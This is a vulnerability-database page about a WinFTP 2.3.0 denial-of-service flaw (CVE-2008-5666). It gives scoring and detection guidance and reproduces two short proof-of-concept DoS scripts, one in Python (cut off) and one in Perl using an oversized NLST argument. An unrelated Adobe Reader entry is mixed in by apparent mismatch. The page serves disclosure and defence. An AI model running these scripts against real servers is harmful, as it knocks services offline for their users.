CVE-2008-5666
published 2008-12-19CVE-2008-5666: WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions…
PriorityP419low3.5CVSS 2.0
AVNACMAuSCNINAP
EXPLOIT
EPSS
20.59%
97.2th percentile
WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wftpserver | winftp_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect repeated FTP sessions sending the sequence PASV followed immediately by 'NLST -1' — this is the exact attack pattern for the DoS trigger in passive mode. ↗
- →Alert on FTP NLST commands containing the argument '-1', especially when preceded by a PASV command in the same session, targeting winftpsrv.exe. ↗
- →Monitor for rapid, looping FTP connection attempts (sleep of 0.2 seconds between sessions) sending PASV+NLST -1 — indicative of automated DoS exploitation. ↗
- →Even anonymous FTP accounts can trigger this DoS if they have NLST permission; flag anonymous logins followed by NLST -1 on WinFTP 2.3.0 servers. ↗
- →A secondary exploit variant uses a long repeated '..?' pattern (~35000 repetitions) as the NLST argument; detect abnormally long NLST argument strings on port 21. ↗
- ·The DoS is specifically triggered only when passive (PASV) mode is in use; the vulnerability does not apply to active mode FTP sessions. ↗
- ·Authentication is required, but the privilege bar is low — anonymous accounts with NLST permission are sufficient to exploit this vulnerability. ↗
CVSS provenance
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:N/A:P
vendor_redhat6.2MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wxv2-27rf-hx46: WinFTP FTP Server 2
ghsa_unreviewed·2022-05-17
CVE-2008-5666 [LOW] GHSA-wxv2-27rf-hx46: WinFTP FTP Server 2
WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.
Red Hat
acroread JavaScript Insecure Libary Search Path
vendor_redhat·2008-02-08·CVSS 6.2
CVE-2007-5666 [MEDIUM] acroread JavaScript Insecure Libary Search Path
acroread JavaScript Insecure Libary Search Path
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
No detection rules found.
Exploit-DB
WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
exploitdb·2008-10-09
CVE-2008-5666 WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
---
# WinFTP v2.3.0 DoS exploit
# WinFTP URL - http://www.wftpserver.com/
# DoS'ed when try to send data
# (x)dmnt
# -*- coding: windows-1252 -*-
import socket
import time
import sys
PORT = 21
def help_info():
print ("Usage: winftp \n")
print ("Note: anonymous is enought\n")
def conn(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, PORT))
except:
print ("[+] Done!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("USER %s\n" %username)
sock.send("PASS %s\n" %passwd)
sock.send("PASV\n")
sock.send("NLST -1\n")
sock.send("QUIT\n")
sock.close()
print ("\n[WinFTP v2.3.0 remote DoS exploit]")
print ("[(x)dmnt 2008 without any clue :)]\n\n")
if len(sys.ar
Exploit-DB
WinFTP Server 2.3.0 - 'NLST' Denial of Service
exploitdb·2008-09-26
CVE-2008-5666 WinFTP Server 2.3.0 - 'NLST' Denial of Service
WinFTP Server 2.3.0 - 'NLST' Denial of Service
---
#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
# by Julien Bedard
#
####################################
use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;
$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;
$ftp->nlst($overflow);
$ftp->quit;
# milw0rm.com [2008-09-26]
Metasploit
WinFTP 2.3.0 NLST Denial of Service
metasploit
WinFTP 2.3.0 NLST Denial of Service
WinFTP 2.3.0 NLST Denial of Service
This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.
http://secunia.com/advisories/32209http://securityreason.com/securityalert/4785http://www.securitytracker.com/id?1021040http://www.vupen.com/english/advisories/2008/2801https://exchange.xforce.ibmcloud.com/vulnerabilities/45806https://www.exploit-db.com/exploits/6717http://secunia.com/advisories/32209http://securityreason.com/securityalert/4785http://www.securitytracker.com/id?1021040http://www.vupen.com/english/advisories/2008/2801https://exchange.xforce.ibmcloud.com/vulnerabilities/45806https://www.exploit-db.com/exploits/6717
2008-12-19
Published